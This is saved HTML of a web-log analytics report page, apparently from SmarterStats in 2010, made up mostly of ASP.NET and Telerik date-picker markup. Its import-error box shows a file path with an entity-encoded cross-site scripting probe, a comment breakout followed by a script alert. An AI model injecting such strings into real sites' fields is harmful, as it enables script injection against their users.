<script src="/ScriptResource.axd?d=rLkVatSveEIPrLuVrqd-Rqu9c-Qp5n3u_agt7bqrbK66Z1GODOCn_TqYoCtv79JakYjGy-hs5HVRebk_BZqNoTXEExvRXPbqgtEiHRkA8jwIrcayoDlnuZWpcWkdnNZ0Xh2nW6TTKEXMqhxGKpfZuDd_ibYZO_jwoRaEz-gTuis1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=_lSjFkDxd3Gnr7ocFU6QUkZOrdHPnZsqNRClSK61AtN-ATLEiBiN0mgZ6qde0SYytY9Y7JPZGbAn0G1XxGzBJPMqZRiXEJK-nZxx5QIbzRoDB5Syl5oGPlUxKWDON3Z5Ld0hMHW-sKkMnHWb_hwzCyUGXoXIUKoCDwj5C88getY1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=JOd_zE-rVnhst9gjbTnWxhkLnomfRJOvAba74jYUNOYndrLTcDyBPLUH4sKs48Lj5n5-lBATFKj-hFHq_rS8K95dEYHJCXJBFm6TbI7MrJu3R7ZD9vx_k8jaeCbKbroCzLu5qdhlqN8jh5PII2qVOLUrmc7F1nKNJN5I5VXGXQI1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=dim8nyrCK3sbBE3vfEjhnHLVQjoQa7K4EDVi51FwrwWZRYjEGIN1TgwIRvo7NIo5VbnkeJxu3LEwuEak1hX108zj9QGEZyRv54Qk_tiJNRVGHTif1EoYWVv49mnpinZUuNk-PXItaRDiww30xt64kKGWlIR8GsCqaB2e72wdFJ01&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=M1ICYTROEq6Ql9y7PDNqrCxwQa2kits8uxrGGwbPfC-BHyJqGbMtKJgZywmD6smfBh2fWMrA8N_QYL5pca4CHQunZwujs5xpqHQQBRkMLnZ1axo0M2uf3lHNZ83m5kv_rhsD90Pm968qBTe6ctQmcba0FFtJnkHipWazocyhYiQ1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
var PageMethods = function() {
PageMethods.initializeBase(this);
this._timeout = 0;
this._userContext = null;
this._succeeded = null;
this._failed = null;
}
PageMethods.prototype = {
_get_path:function() {
var p = this.get_path();
if (p) return p;
else return PageMethods._staticInstance.get_path();},
GetReportProgress:function(guid,succeededCallback, failedCallback, userContext) {
return this._invoke(this._get_path(), 'GetReportProgress',false,{guid:guid},succeededCallback,failedCallback,userContext); }}
PageMethods.registerClass('PageMethods',Sys.Net.WebServiceProxy);
PageMethods._staticInstance = new PageMethods();
PageMethods.set_path = function(value) { PageMethods._staticInstance.set_path(value); }
PageMethods.get_path = function() { return PageMethods._staticInstance.get_path(); }
PageMethods.set_timeout = function(value) { PageMethods._staticInstance.set_timeout(value); }
PageMethods.get_timeout = function() { return PageMethods._staticInstance.get_timeout(); }
PageMethods.set_defaultUserContext = function(value) { PageMethods._staticInstance.set_defaultUserContext(value); }
PageMethods.get_defaultUserContext = function() { return PageMethods._staticInstance.get_defaultUserContext(); }
PageMethods.set_defaultSucceededCallback = function(value) { PageMethods._staticInstance.set_defaultSucceededCallback(value); }
PageMethods.get_defaultSucceededCallback = function() { return PageMethods._staticInstance.get_defaultSucceededCallback(); }
PageMethods.set_defaultFailedCallback = function(value) { PageMethods._staticInstance.set_defaultFailedCallback(value); }
PageMethods.get_defaultFailedCallback = function() { return PageMethods._staticInstance.get_defaultFailedCallback(); }
PageMethods.set_enableJsonp = function(value) { PageMethods._staticInstance.set_enableJsonp(value); }
PageMethods.get_enableJsonp = function() { return PageMethods._staticInstance.get_enableJsonp(); }
PageMethods.set_jsonpCallbackParameter = function(value) { PageMethods._staticInstance.set_jsonpCallbackParameter(value); }
PageMethods.get_jsonpCallbackParameter = function() { return PageMethods._staticInstance.get_jsonpCallbackParameter(); }
PageMethods.set_path("frmViewReports.aspx");
PageMethods.GetReportProgress= function(guid,onSuccess,onFailed,userContext) {PageMethods._staticInstance.GetReportProgress(guid,onSuccess,onFailed,userContext); }
//]]>
</script>


       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$BPH$UpdatePanel2','','tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1','','tctl00$MPH$UP1',''], ['ctl00$MPH$btnGenerateReport','','ctl00$MPH$btnShowReport',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       View Report
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_UpdatePanel2">
   
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       
</div>

           </div>
           <div class="ButtonBarRight">
               

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="ReportLoadingProgress" id="ReportLoadingProgress">
       <div class="ProgressContainer" id="ProgressContainer">
           <div class="ProgressBar" id="ProgressBar">
           </div>
       </div>
       <div class="ProgressText" id="ProgressText">
       </div>
   </div>
   <div id="ctl00_MPH_ReportBar" class="ReportOptionsBar">
       <div class='ReportOptionSection'>
           <div>
               <table class='ReportOptionSection'>
                   <tr>
                       <td class='ReportItemOptionLabel'>
                           Date Range
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadStartDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <!-- 2010.2.817.40 --><input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate" name="ctl00$MPH$RadStartDate" type="text" class="rdfd_" value="2010-10-05" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadStartDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/5/2010" id="ctl00_MPH_RadStartDate_dateInput_text" name="ctl00_MPH_RadStartDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate_dateInput" name="ctl00$MPH$RadStartDate$dateInput" type="text" class="rdfd_" value="2010-10-05-00-00-00" /><input id="ctl00_MPH_RadStartDate_dateInput_ClientState" name="ctl00_MPH_RadStartDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadStartDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadStartDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadStartDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadStartDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadStartDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadStartDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadStartDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadStartDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadStartDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadStartDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_SD" id="ctl00_MPH_RadStartDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_AD" id="ctl00_MPH_RadStartDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadStartDate_ClientState" name="ctl00_MPH_RadStartDate_ClientState" type="hidden" />
</div>
                       </td>
                       <td class='PaddedText'>
                           to
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadEndDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate" name="ctl00$MPH$RadEndDate" type="text" class="rdfd_" value="2010-10-11" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadEndDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/11/2010" id="ctl00_MPH_RadEndDate_dateInput_text" name="ctl00_MPH_RadEndDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate_dateInput" name="ctl00$MPH$RadEndDate$dateInput" type="text" class="rdfd_" value="2010-10-11-00-00-00" /><input id="ctl00_MPH_RadEndDate_dateInput_ClientState" name="ctl00_MPH_RadEndDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadEndDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadEndDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadEndDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadEndDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadEndDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadEndDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadEndDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadEndDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadEndDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadEndDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_SD" id="ctl00_MPH_RadEndDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_AD" id="ctl00_MPH_RadEndDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadEndDate_ClientState" name="ctl00_MPH_RadEndDate_ClientState" type="hidden" />
</div>
                       </td>
                   </tr>
               </table>
           </div>
           <div>
               <table cellspacing='0' class='ReportOptionSection'>
                   <tr>
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       <td class='GenerateReportButton'>
                           <div id="ctl00_MPH_btnGenerateReport" class="BBButton RefreshButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$MPH$btnGenerateReport',''); return false;"><span class="BBInner"></span></a></div>
                       </td>
                   </tr>
               </table>
           </div>
       </div>
       <div class='ReportOptionSection' style='display: none'>
           <div id="ctl00_MPH_UpdatePanel1">
   
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               
</div>
       </div>
   </div>
   <input type="hidden" name="ctl00$MPH$hfDMFilename" id="ctl00_MPH_hfDMFilename" />
   <input type="hidden" name="ctl00$MPH$hfDMReport" id="ctl00_MPH_hfDMReport" />
   <div id="ctl00_MPH_UP1">
   
           
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       
</div>
   <input type="submit" name="ctl00$MPH$btnShowReport" value="Display Report" id="ctl00_MPH_btnShowReport" style="display: none" />

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewreports', 'Standard\x5fWebmaster');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=Specific/ProgressBar"></script>

   <script type="text/javascript">
       var loaded = false;
       function DoDataMine(file, report) {
           //location.href = '/Client/frmViewReports.aspx?reporttype=interactive&file=' + file + '&mine=' + report;
           parent.dmFilename = file;
           parent.dmQuery = report;
           parent.UpdateSection('UserDataMining', null, false, false); //filename
       }
       function AddFavoritePopup() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 320, null);
       }
       function AddFavoritePopup_Interactive() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 500, 270, null);
       }
       function AddFavoritePopup_SEO() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 230, null);
       }
       function ExportReportPopup() {
           var url = "/Client/Popups/frmExportReport.aspx";
           window.name = "GenericWindow";
           SpawnHyperWindow(url, 400, 100, null);
       }
       function EmailReportPopup() {
           if (false)
           {
            var url = "/Client/Popups/frmEmailReport.aspx";
            window.name = "GenericWindow";
            SpawnHyperWindow(url, 450, 340, null);
           }
           else
           {
            ShowAlertWindow("In order to send reports through email, SMTP information must be entered into the Email Settings page by a site administrator.");
           }
       }
       function PrintReportPopup() {
           var url = "/Client/Popups/frmPrintPreview.aspx";
           parent.GenericPopup(url, "PrintPreview", "width=700,height=500,resizable=yes,scrollbars=yes,status=no");
       }
       function RadDataMine(filename, miningset, report) {
        SpawnHyperWindowWithElement(
        "/Client/Popups/frmDataMine.aspx?file=" + filename + "&miningset=" + miningset + "&report=" + report,
        400, 130, null, DoDataMine);
       }

       function GetProgressUpdate() {
           PageMethods.GetReportProgress(progressGuid, ProgressBarCallbackComplete, ProgressBarCallbackFailed);
       }
       function DoReportPostBack() {
           //
__doPostBack('ctl00$MPH$btnShowReport','');
       }
       function DoReportCancel() {
           //
__doPostBack('ctl00$MPH$lnkCancel','');;
       }
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
       var ProgressBarText = 'Processing';

   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewReports\x2easpx?Custom\x3dFalse\x26ReportType\x3dStandard\x26subReportName\x3dWebmaster'); });
$(function() { SetTopTitle('View\x20Report'); });
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/5/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadStartDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadStartDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadStartDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadStartDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadStartDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadStartDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadStartDate_calendar"));
});
Sys.Application.add_init(function() {
